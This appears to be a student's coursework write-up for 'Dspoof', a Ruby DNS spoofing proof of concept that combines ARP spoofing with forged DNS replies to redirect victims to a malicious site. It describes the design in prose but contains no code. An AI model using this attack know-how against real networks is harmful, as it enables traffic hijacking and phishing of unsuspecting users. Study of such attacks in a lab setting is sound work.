Dspoof, a Simple DNS Spoofing Application

Summary & Introduction

The objective for this particular assignment is to create a simple DNS spoofing application using Ruby or any other preferred language. With the supplied module on the DNS protocol, design and framework for basic DNS manipulation, we are to create a DNS spoofing application as a proof of concept (POC). Website spoofing is the main functionality that the program requires.

There are a few constraints and they are as follows:

• Detect DNS queries and respond with crafted Response answer that points victim to a user (attacker) specified site
• Need to be able to handle any arbitrary domain name and return spoofed Response
• Tests will only be conducted on our own machines and not carry out any DNS spoofing on unsuspecting users

Some findings from this assignment are that the main hexadecimal values including the transaction ID and domain name are generally the only values that change when comparing legitimate DNS responses. In addition, the source and destination ports in the UDP payload of the DNS reply need to be set appropriately - in this case, the (Type A) response should have a destination port of the source from the queries.

Design

Much of the provided ARP spoof examples were preserved with the exception of hard coding the source and destination IP/MAC addresses, etc. This is made possible by using the Utils class from the PacketFu library. Aside from spoofing the ARP, extra functionality is to be required including the capturing of DNS traffic, extracting the domain name, and replying with a crafted response that can redirect the victim to a malicious counterpart of a popular website.

Diagram

Check out the full source code on GitHub.